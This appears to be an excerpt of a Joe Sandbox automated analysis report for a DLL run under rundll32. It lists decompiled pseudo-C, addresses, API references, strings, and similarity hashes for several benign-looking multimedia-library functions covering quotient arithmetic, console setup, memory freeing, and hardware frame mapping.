						_t35 = _t188 + 0x2c; // 0x0
						_v52 =  *_t34;
						_v48 =  *_t35;
						_t178 =  *((intOrPtr*)(_t189 + 0x2c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x28));
						_v56 = _t178;
						_t112 = L10035A10(_t149, _t188, _t189);
						 *_t201 = _t149;
						_v56 = _t176;
						_v48 = _t178;
						_t114 =  <  ? _t112 :  ~_t112;
						_v52 =  <  ? _t112 :  ~_t112;
						_t150 = L10035990(_t149, _t189);
						_t44 = _t188 + 0x30; // 0x0
						_t45 = _t188 + 0x34; // 0x0
						_v52 =  *_t44;
						_v48 =  *_t45;
						_t180 =  *((intOrPtr*)(_t189 + 0x34));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x30));
						_v56 = _t180;
						_t118 = L10035A10(_t150, _t188, _t189);
						 *_t201 = _t150;
						_v56 = _t178;
						_v48 = _t180;
						_t120 =  <  ? _t118 :  ~_t118;
						_v52 =  <  ? _t118 :  ~_t118;
						_t151 = L10035990(_t150, _t189);
						_t54 = _t188 + 0x38; // 0x0
						_t55 = _t188 + 0x3c; // 0x0
						_v52 =  *_t54;
						_v48 =  *_t55;
						_t182 =  *((intOrPtr*)(_t189 + 0x3c));
						 *_t201 =  *((intOrPtr*)(_t189 + 0x38));
						_v56 = _t182;
						_t124 = L10035A10(_t151, _t188, _t189);
						 *_t201 = _t151;
						_v56 = _t180;
						_v48 = _t182;
						_t126 =  <  ? _t124 :  ~_t124;
						_v52 =  <  ? _t124 :  ~_t124;
						_t152 = L10035990(_t151, _t189);
						_t64 = _t188 + 4; // 0x1000fea8
						_v52 =  *_t188;
						_v48 =  *_t64;
						_t184 =  *(_t189 + 4);
						 *_t201 =  *_t189;
						_v56 = _t184;
						_t130 = L10035A10(_t152, _t188, _t189);
						 *_t201 = _t152;
						_v56 = _t182;
						_v48 = _t184;
						_t132 =  <  ? _t130 :  ~_t130;
						_v52 =  <  ? _t130 :  ~_t130;
						_t153 = L10035990(_t152, _t189);
						_t72 = _t188 + 8; // 0x1000ff00
						_t73 = _t188 + 0xc; // 0x1000ff58
						_v52 =  *_t72;
						_v48 =  *_t73;
						_t186 =  *(_t189 + 0xc);
						 *_t201 =  *((intOrPtr*)(_t189 + 8));
						_v56 = _t186;
						_t136 = L10035A10(_t153, _t188, _t189);
						 *_t201 = _t153;
						_v56 = _t184;
						_v48 = _t186;
						_t138 =  <  ? _t136 :  ~_t136;
						_v52 =  <  ? _t136 :  ~_t136;
						_t139 = L10035990(_t153, _t189);
						_v36 = _t186;
						_t154 = _t139;
						_t199 = _t186;
						_v32 = _t186 >> 0x1f;
						_t187 = 0x3e8 * _t154 >> 0x20;
						asm("sbb edx, [esp+0x1c]");
						if((_t187 | 0x000003e8 * _t154 - _v36) != 0) {
							_t158 = (_v32 ^ _t187) >> 0x0000001f | 0x00000001;
							goto L7;
						} else {
							if(_t199 != 0) {
								continue;
							} else {
								if(_t154 == 0) {
									L8:
									return _v40;
								} else {
									_t158 = _t154 >> 0x1f;
									L7:
									if(_t158 + 1 != 0) {
										continue;
									} else {
										goto L8;
									}
								}
							}
						}
					}
					L11:
				}
				_v40 = 2;
				return _v40;
				goto L11;
			}

0x10010324
0x1001032b
0x1001032e
0x10010332
0x10010340
0x10010340
0x10010344
0x1001034e
0x00000000
0x00000000
0x10010354
0x10010359
0x00000000
0x1001035b
0x10010361
0x10010364
0x10010364
0x10010367
0x1001036a
0x1001036e
0x10010372
0x10010376
0x1001037d
0x1001037f
0x10010384
0x10010387
0x1001038a
0x1001038e
0x10010395
0x10010398
0x1001039b
0x1001039f
0x100103a4
0x100103a7
0x100103ab
0x100103b3
0x100103b6
0x100103bf
0x100103c3
0x100103c6
0x100103c9
0x100103cd
0x100103d4
0x100103d7
0x100103da
0x100103de
0x100103e3
0x100103e6
0x100103ea
0x100103f2
0x100103f5
0x100103fe
0x10010402
0x10010405
0x10010408
0x1001040c
0x10010413
0x10010416
0x10010419
0x1001041d
0x10010422
0x10010425
0x10010429
0x10010431
0x10010434
0x1001043d
0x10010441
0x10010444
0x10010447
0x1001044b
0x10010452
0x10010455
0x10010458
0x1001045c
0x10010461
0x10010464
0x10010468
0x10010470
0x10010473
0x1001047c
0x10010480
0x10010483
0x10010486
0x1001048a
0x10010491
0x10010494
0x10010497
0x1001049b
0x100104a0
0x100104a3
0x100104a7
0x100104af
0x100104b2
0x100104bb
0x100104c1
0x100104c4
0x100104c8
0x100104ce
0x100104d1
0x100104d4
0x100104d8
0x100104dd
0x100104e0
0x100104e4
0x100104ec
0x100104ef
0x100104f8
0x100104fc
0x100104ff
0x10010502
0x10010506
0x1001050d
0x10010510
0x10010513
0x10010517
0x1001051c
0x1001051f
0x10010523
0x1001052b
0x1001052e
0x10010532
0x10010537
0x1001053b
0x10010542
0x10010544
0x1001054d
0x10010553
0x1001055b
0x10010591
0x00000000
0x1001055d
0x1001055f
0x00000000
0x10010565
0x10010567
0x10010576
0x10010581
0x10010569
0x10010569
0x1001056c
0x10010570
0x00000000
0x00000000
0x00000000
0x00000000
0x10010570
0x10010567
0x1001055f
0x1001055b
0x00000000
0x10010359
0x100105a5
0x100105b4
0x00000000

APIs

mv_sub_q.F072 ref: 10010376
mv_sub_q.F072 ref: 1001039F
mv_add_q.F072 ref: 100103BA
mv_sub_q.F072 ref: 100103DE
mv_add_q.F072 ref: 100103F9
mv_sub_q.F072 ref: 1001041D
mv_add_q.F072 ref: 10010438
mv_sub_q.F072 ref: 1001045C
mv_add_q.F072 ref: 10010477
mv_sub_q.F072 ref: 1001049B
mv_add_q.F072 ref: 100104B6

Part of subcall function 10035990: mv_reduce.F072(?,?), ref: 100359E9

mv_sub_q.F072 ref: 100104D8

Part of subcall function 10035A10: mv_reduce.F072(?), ref: 10035A81

mv_add_q.F072 ref: 100104F3
mv_sub_q.F072 ref: 10010517
mv_add_q.F072 ref: 10010532

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_sub_q$mv_add_q$mv_reduce
String ID:
API String ID: 416313997-0
Opcode ID: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
Instruction ID: 2bd5eacdd0496173cebd80a3581587597599a29e230854eb82bb207fe0e5f862
Opcode Fuzzy Hash: fd26de4a70a645a75b6084fdddd25abeecc13d0e1f18b84e77e2c88ea45aa38b
Instruction Fuzzy Hash: 0281A1B4A08B069FC748DF6AD18051AFBE1FF88211F50C92EE59DC7721E670E8519F82

Uniqueness

Uniqueness Score: -1.00%

Function 100257B0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 182COMMON

Download Yara Rule

APIs

SetConsoleTextAttribute.KERNEL32 ref: 1002581C

Part of subcall function 10025640: WriteConsoleW.KERNEL32 ref: 1002570D

SetConsoleTextAttribute.KERNEL32 ref: 1002583B
getenv.MSVCRT ref: 1002588F
GetStdHandle.KERNEL32 ref: 1002589D
GetConsoleMode.KERNEL32 ref: 100258BB
GetConsoleScreenBufferInfo.KERNEL32 ref: 100258E1
getenv.MSVCRT ref: 10025907
getenv.MSVCRT ref: 10025924

Strings

256color, xrefs: 100259B3

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: Console$getenv$AttributeText$BufferHandleInfoModeScreenWrite
String ID: 256color
API String ID: 1581660180-717642456
Opcode ID: b3342b7d85a04b310def07ad1c1987400b6fe5cb5a4dd7535e95db26552900fd
Instruction ID: 236701e196a9f5f0b8e09ae7c06ec1091ad9f70c104838dff11f3c92fdddfe69
Opcode Fuzzy Hash: b3342b7d85a04b310def07ad1c1987400b6fe5cb5a4dd7535e95db26552900fd
Instruction Fuzzy Hash: 2A715D74908755CBD710EF28988412EBBE1FF88351F918A2EECDA97390E779D840CB56

Uniqueness

Uniqueness Score: -1.00%

Function 1001A460 Relevance: 19.6, APIs: 13, Instructions: 146
COMMON

Download Yara Rule

C-Code - Quality: 35%

			E1001A460(signed char __eax) {
				void* __ebx;
				void* __esi;
				void* _t68;
				intOrPtr _t74;
				signed char _t79;
				signed char _t82;
				char* _t83;
				intOrPtr _t85;
				signed int _t86;
				signed int _t89;
				intOrPtr _t90;
				signed int _t92;
				signed int _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				intOrPtr* _t98;
				void* _t99;
				intOrPtr* _t100;

				_t79 = __eax;
				_t100 = _t99 - 0x1c;
				if( *((intOrPtr*)(__eax + 0xe4)) > 0) {
					_t89 = 0;
					do {
						_t98 =  *((intOrPtr*)(__eax + 0xe0)) + _t89 * 4;
						_t89 = _t89 + 1;
						_t95 =  *_t98;
						_t96 = _t95 + 0xc;
						 *_t100 = _t95 + 0x10;
						E1000A000(__eax, _t96);
						 *_t100 = _t96;
						L10011CC0();
						 *_t100 = _t98;
						E100290E0();
					} while (_t89 <  *((intOrPtr*)(_t79 + 0xe4)));
				}
				_t90 = _t79 + 0xb8;
				 *((intOrPtr*)(_t79 + 0xe4)) = 0;
				 *_t100 = _t79 + 0xe0;
				_t85 = _t79 + 0xd8;
				E100290E0();
				do {
					 *_t100 = _t90;
					_t90 = _t90 + 4;
					E1000A000(_t79, _t90);
				} while (_t85 != _t90);
				if( *((intOrPtr*)(_t79 + 0xdc)) > 0) {
					_t94 = 0;
					do {
						_t74 =  *((intOrPtr*)(_t79 + 0xd8)) + _t94 * 4;
						_t94 = _t94 + 1;
						 *_t100 = _t74;
						E1000A000(_t79, _t94);
					} while (_t94 <  *((intOrPtr*)(_t79 + 0xdc)));
				}
				 *_t100 = _t85;
				E100290E0();
				 *_t100 = _t79 + 0x118;
				L10011CC0();
				 *_t100 = _t79 + 0x128;
				E1000A000(_t79, _t90);
				 *_t100 = _t79 + 0x12c;
				E1000A000(_t79, _t90);
				 *_t100 = _t79 + 0x140;
				E1000A000(_t79, _t90);
				if( *(_t79 + 0x40) != _t79) {
					 *_t100 = _t79 + 0x40;
					E100290E0();
				}
				_t86 = 0x168;
				 *_t100 = _t79 + 0x148;
				E1000D270();
				_t82 = _t79;
				if((_t79 & 0x00000001) != 0) {
					 *_t79 = 0;
					_t82 = _t79 + 1;
					_t86 = 0x167;
					if((_t82 & 0x00000002) == 0) {
						goto L12;
					} else {
						goto L20;
					}
					L14:
					_t83 = _t82 + _t68;
					if((_t86 & 0x00000004) != 0) {
						 *_t83 = 0;
						_t83 = _t83 + 4;
					}
					if((_t86 & 0x00000002) != 0) {
						 *_t83 = 0;
						_t83 = _t83 + 2;
					}
					if((_t86 & 0x00000001) != 0) {
						 *_t83 = 0;
					}
					 *((intOrPtr*)(_t79 + 0x100)) = 0;
					 *((intOrPtr*)(_t79 + 0xf4)) = 2;
					 *((intOrPtr*)(_t79 + 0x70)) = 0;
					 *((intOrPtr*)(_t79 + 0x74)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x68)) = 0;
					 *((intOrPtr*)(_t79 + 0x6c)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x104)) = 0x80000000;
					 *((intOrPtr*)(_t79 + 0x108)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x10c)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x124)) = 0xffffffff;
					 *((intOrPtr*)(_t79 + 0x7c)) = 1;
					 *((intOrPtr*)(_t79 + 0x54)) = 1;
					 *((intOrPtr*)(_t79 + 0x60)) = 1;
					 *((intOrPtr*)(_t79 + 0x50)) = 0xffffffff;
					 *(_t79 + 0x40) = _t79;
					 *((intOrPtr*)(_t79 + 0xf0)) = 2;
					 *((intOrPtr*)(_t79 + 0xf8)) = 2;
					return 2;
				} else {
					if((_t82 & 0x00000002) != 0) {
						L20:
						 *_t82 = 0;
						_t86 = _t86 - 2;
						_t82 = _t82 + 2;
					}
				}
				L12:
				_t68 = 0;
				_t92 = _t86 & 0xfffffff8;
				do {
					 *((intOrPtr*)(_t82 + _t68)) = 0;
					 *((intOrPtr*)(_t82 + _t68 + 4)) = 0;
					_t68 = _t68 + 8;
				} while (_t68 < _t92);
				goto L14;
			}

0x1001a464
0x1001a466
0x1001a471
0x1001a473
0x1001a480
0x1001a486
0x1001a489
0x1001a48a
0x1001a490
0x1001a493
0x1001a496
0x1001a49b
0x1001a49e
0x1001a4a3
0x1001a4a6
0x1001a4ab
0x1001a480
0x1001a4b3
0x1001a4bb
0x1001a4c7
0x1001a4ca
0x1001a4d0
0x1001a4e0
0x1001a4e0
0x1001a4e3
0x1001a4e6
0x1001a4eb
0x1001a4f7
0x1001a4f9
0x1001a500
0x1001a506
0x1001a509
0x1001a50a
0x1001a50d
0x1001a512
0x1001a500
0x1001a51a
0x1001a51d
0x1001a528
0x1001a52b
0x1001a536
0x1001a539
0x1001a544
0x1001a547
0x1001a552
0x1001a555
0x1001a55d
0x1001a562
0x1001a565
0x1001a565
0x1001a570
0x1001a575
0x1001a578
0x1001a582
0x1001a584
0x1001a668
0x1001a66b
0x1001a66e
0x1001a676
0x00000000
0x00000000
0x00000000
0x00000000
0x1001a5a8
0x1001a5a8
0x1001a5b0
0x1001a6a5
0x1001a6ab
0x1001a6ab
0x1001a5bc
0x1001a698
0x1001a69d
0x1001a69d
0x1001a5c5
0x1001a690
0x1001a690
0x1001a5d2
0x1001a5e2
0x1001a5f2
0x1001a603
0x1001a60a
0x1001a611
0x1001a618
0x1001a61e
0x1001a624
0x1001a62a
0x1001a630
0x1001a637
0x1001a63e
0x1001a645
0x1001a64c
0x1001a64f
0x1001a655
0x1001a662
0x1001a58a
0x1001a58d
0x1001a680
0x1001a680
0x1001a685
0x1001a688
0x1001a688
0x1001a58d
0x1001a593
0x1001a595
0x1001a597
0x1001a59a
0x1001a59a
0x1001a59d
0x1001a5a1
0x1001a5a4
0x00000000

APIs

mv_dict_free.F072 ref: 1001A49E
mv_freep.F072 ref: 1001A4A6
mv_buffer_unref.F072 ref: 1001A496

Part of subcall function 1000A000: mv_freep.F072 ref: 1000A01E

mv_freep.F072 ref: 1001A4D0
mv_buffer_unref.F072 ref: 1001A4E6
mv_buffer_unref.F072 ref: 1001A50D
mv_freep.F072 ref: 1001A51D
mv_dict_free.F072 ref: 1001A52B
mv_buffer_unref.F072 ref: 1001A539
mv_buffer_unref.F072 ref: 1001A547
mv_buffer_unref.F072 ref: 1001A555
mv_freep.F072 ref: 1001A565
mv_channel_layout_uninit.F072 ref: 1001A578

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_buffer_unref$mv_freep$mv_dict_free$mv_channel_layout_uninit
String ID:
API String ID: 1735483532-0
Opcode ID: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
Instruction ID: e5137f4a5bc7018b3bf66a3982d40490682209c4fe07239027ca6129b2817d8d
Opcode Fuzzy Hash: b1f051f397a595c89fd00aa7c4bdbf0e8165c123e935fbb0ada5b3fbc138a149
Instruction Fuzzy Hash: 66516BB19046068BDB10DF28C48178A77E5FF45364F0A46BADC989F38AD774E8C5CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 1000C640 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 190stringCOMMON

Download Yara Rule

APIs

strlen.MSVCRT ref: 1000C650
memcmp.MSVCRT ref: 1000C6F4

Strings

mono, xrefs: 1000C6B0

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: memcmpstrlen
String ID: mono
API String ID: 3108337309-2381334079
Opcode ID: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
Instruction ID: 18b6b574f71558c9a9b0b92199a84ecc10b2be927aad7e864a8dbdfaab720d03
Opcode Fuzzy Hash: 961e4d7430c6ee58c8d49aecf6a6276b133ce91f2d562b03286109f610fa6c8a
Instruction Fuzzy Hash: 62713A74A083598FD354DF25C48491EBBE2FFC8384F51892DE88997319DB34E9458F86

Uniqueness

Uniqueness Score: -1.00%

Function 1001E7F0 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 173COMMON

Download Yara Rule

APIs

mv_get_pix_fmt_name.F072 ref: 1001E9EE
mv_log.F072 ref: 1001EA15

Strings

The hardware pixel format '%s' is not supported by the device type '%s', xrefs: 1001EA03

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_get_pix_fmt_namemv_log
String ID: The hardware pixel format '%s' is not supported by the device type '%s'
API String ID: 3418758923-379977042
Opcode ID: 9b272a863b8c87bc50828a51ff6e70bc1a94dffcb6cd8086de82a19a6494632f
Instruction ID: a270e7ec8c0c912217b56fd727a34e093eb2c836343d1efa160e437917b73519
Opcode Fuzzy Hash: 9b272a863b8c87bc50828a51ff6e70bc1a94dffcb6cd8086de82a19a6494632f
Instruction Fuzzy Hash: 9F61B3746087858FD750DF69C480A0EF7E5FF88354F568A6DE998DB311E670EC818B82

Uniqueness

Uniqueness Score: -1.00%

Function 1000A1D0 Relevance: 18.2, APIs: 12, Instructions: 174COMMON

Download Yara Rule

APIs

mv_realloc.F072 ref: 1000A231
mv_mallocz.F072 ref: 1000A24B
mv_mallocz.F072 ref: 1000A284
mv_freep.F072 ref: 1000A2DA
mv_realloc.F072 ref: 1000A344
mv_realloc.F072 ref: 1000A36B
mv_mallocz.F072 ref: 1000A385
mv_mallocz.F072 ref: 1000A3BC

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399252714.00000000101DF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E0000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399264457.00000000101E3000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399300143.00000000101FE000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_rundll32.jbxd

Similarity

API ID: mv_mallocz$mv_realloc$mv_freep
String ID:
API String ID: 3944475926-0
Opcode ID: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
Instruction ID: 0671ab7339bb216cd2d01b0f004d479de4b058bf66c6df6044412f8339b3df2e
Opcode Fuzzy Hash: a6fa4d2bae3b4a2bda0a35254eb544c858f4501f780d02fc74c31e633d2e6906
Instruction Fuzzy Hash: 937104B48087018FE714DF25C18471AFBE0FF86380F568A6DE9898B365D775E980CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1001E690 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 101
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E1001E690(intOrPtr _a4, char _a8) {
				char _v16;
				intOrPtr _v32;
				intOrPtr _v48;
				char* _v52;
				char _v56;
				void* __ebx;
				void* __esi;
				intOrPtr _t37;
				intOrPtr _t38;
				intOrPtr _t39;
				intOrPtr _t42;
				intOrPtr _t45;
				char _t46;
				intOrPtr _t49;
				char _t58;
				intOrPtr* _t63;
				intOrPtr _t64;
				intOrPtr _t70;
				intOrPtr _t71;
				void* _t72;
				intOrPtr* _t73;

				_t73 = _t72 - 0x34;
				_t37 = _a4;
				_t58 = _a8;
				_t71 =  *((intOrPtr*)(_t37 + 4));
				_t63 =  *((intOrPtr*)(_t71 + 4));
				_t61 =  *((intOrPtr*)(_t63 + 0xc));
				if( *((intOrPtr*)(_t63 + 0xc)) == 0) {
					_t64 =  *_t63;
					_t62 =  *((intOrPtr*)(_t64 + 0x3c));
					if( *((intOrPtr*)(_t64 + 0x3c)) == 0) {
						_t38 = 0xffffffd8;
						goto L7;
					} else {
						if( *((intOrPtr*)(_t71 + 0x1c)) == 0) {
							_t38 = 0xffffffea;
							goto L7;
						} else {
							 *_t73 = _t37;
							_t39 = L10009FC0(_t58, _t62);
							 *((intOrPtr*)(_t58 + 0x128)) = _t39;
							if(_t39 == 0) {
								goto L6;
							} else {
								_v56 = _t58;
								 *_t73 = _t71;
								_t42 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)))) + 0x3c))();
								if(_t42 < 0) {
									_v32 = _t42;
									 *_t73 = _t58 + 0x128;
									E1000A000(_t58 + 0x128, _t71);
									_t38 = _v32;
									goto L7;
								} else {
									 *((intOrPtr*)(_t58 + 0x40)) = _t58;
									return 0;
								}
							}
						}
					}
				} else {
					 *((intOrPtr*)(_t58 + 0x50)) =  *((intOrPtr*)(_t71 + 0x24));
					 *_t73 = _t37;
					_t45 = L10009FC0(_t58, _t61);
					 *((intOrPtr*)(_t58 + 0x128)) = _t45;
					if(_t45 == 0) {
						L6:
						_t38 = 0xfffffff4;
						goto L7;
					} else {
						_t46 = L1001AC40(_t58, _t70, _t71);
						_v16 = _t46;
						if(_t46 == 0) {
							goto L6;
						} else {
							_v56 = _t46;
							_v52 = 0;
							 *_t73 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0xc));
							_t49 = E1001E690();
							if(_t49 < 0) {
								L13:
								_v32 = _t49;
								 *_t73 =  &_v16;
								L1001ADB0(_t58);
								return _v32;
							} else {
								 *_t73 = _t58;
								_v52 =  *((intOrPtr*)( *((intOrPtr*)(_t71 + 4)) + 0x10));
								_v56 = _v16;
								_t49 = E1001E450(_t58, _t70, _t71);
								if(_t49 == 0) {
									goto L13;
								} else {
									_v48 = _t49;
									_v32 = _t49;
									_v56 = 0x10;
									_v52 = "Failed to map frame into derived frame context: %d.\n";
									 *_t73 = _t71;
									E10026560();
									 *_t73 =  &_v16;
									L1001ADB0("Failed to map frame into derived frame context: %d.\n");
									_t38 = _v32;
									L7:
									return _t38;
								}
							}
						}
					}
				}
			}

0x1001e692
0x1001e695
0x1001e699
0x1001e69d
0x1001e6a0
0x1001e6a3
0x1001e6a8
0x1001e760
0x1001e762
0x1001e767
0x1001e7e5
0x00000000
0x1001e769
0x1001e76e
0x1001e7db
0x00000000
0x1001e770
0x1001e770
0x1001e773
0x1001e778
0x1001e780
0x00000000
0x1001e782
0x1001e787
0x1001e78b
0x1001e78e
0x1001e793
0x1001e7c0
0x1001e7ca
0x1001e7cd
0x1001e7d2
0x00000000
0x1001e795
0x1001e795
0x1001e79f
0x1001e79f
0x1001e793
0x1001e780
0x1001e76e
0x1001e6ae
0x1001e6b1
0x1001e6b4
0x1001e6b7
0x1001e6bc
0x1001e6c4
0x1001e750
0x1001e750
0x00000000
0x1001e6ca
0x1001e6ca
0x1001e6cf
0x1001e6d5
0x00000000
0x1001e6d7
0x1001e6d7
0x1001e6dd
0x1001e6e7
0x1001e6ea
0x1001e6f1
0x1001e7a0
0x1001e7a0
0x1001e7a8
0x1001e7ab
0x1001e7b9
0x1001e6f7
0x1001e6fd
0x1001e700
0x1001e708
0x1001e70c
0x1001e713
0x00000000
0x1001e719
0x1001e719
0x1001e722
0x1001e72b
0x1001e72f
0x1001e733
0x1001e736
0x1001e73f
0x1001e742
0x1001e747
0x1001e755
0x1001e75a
0x1001e75a
0x1001e713
0x1001e6f1
0x1001e6d5
0x1001e6c4

APIs

mv_frame_alloc.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6CA

Part of subcall function 1001AC40: mv_malloc.F072 ref: 1001AC56

mv_hwframe_get_buffer.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6EA

Part of subcall function 1001E690: mv_hwframe_map.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E70C
Part of subcall function 1001E690: mv_log.F072 ref: 1001E736
Part of subcall function 1001E690: mv_frame_free.F072 ref: 1001E742

mv_buffer_ref.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E6B7

Part of subcall function 10009FC0: mv_mallocz.F072 ref: 10009FD2

mv_buffer_ref.F072(?,?,?,?,?,?,?,?,?,?,?,00000000,1001C33B), ref: 1001E773

Strings

Failed to map frame into derived frame context: %d., xrefs: 1001E71D

Memory Dump Source

Source File: 00000003.00000002.399086536.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.399077275.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399198160.00000000100AD000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399203507.00000000100AE000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.399234800.00000000101DA000.00000002.00000001.01000000.00000003.sdmpDownload File
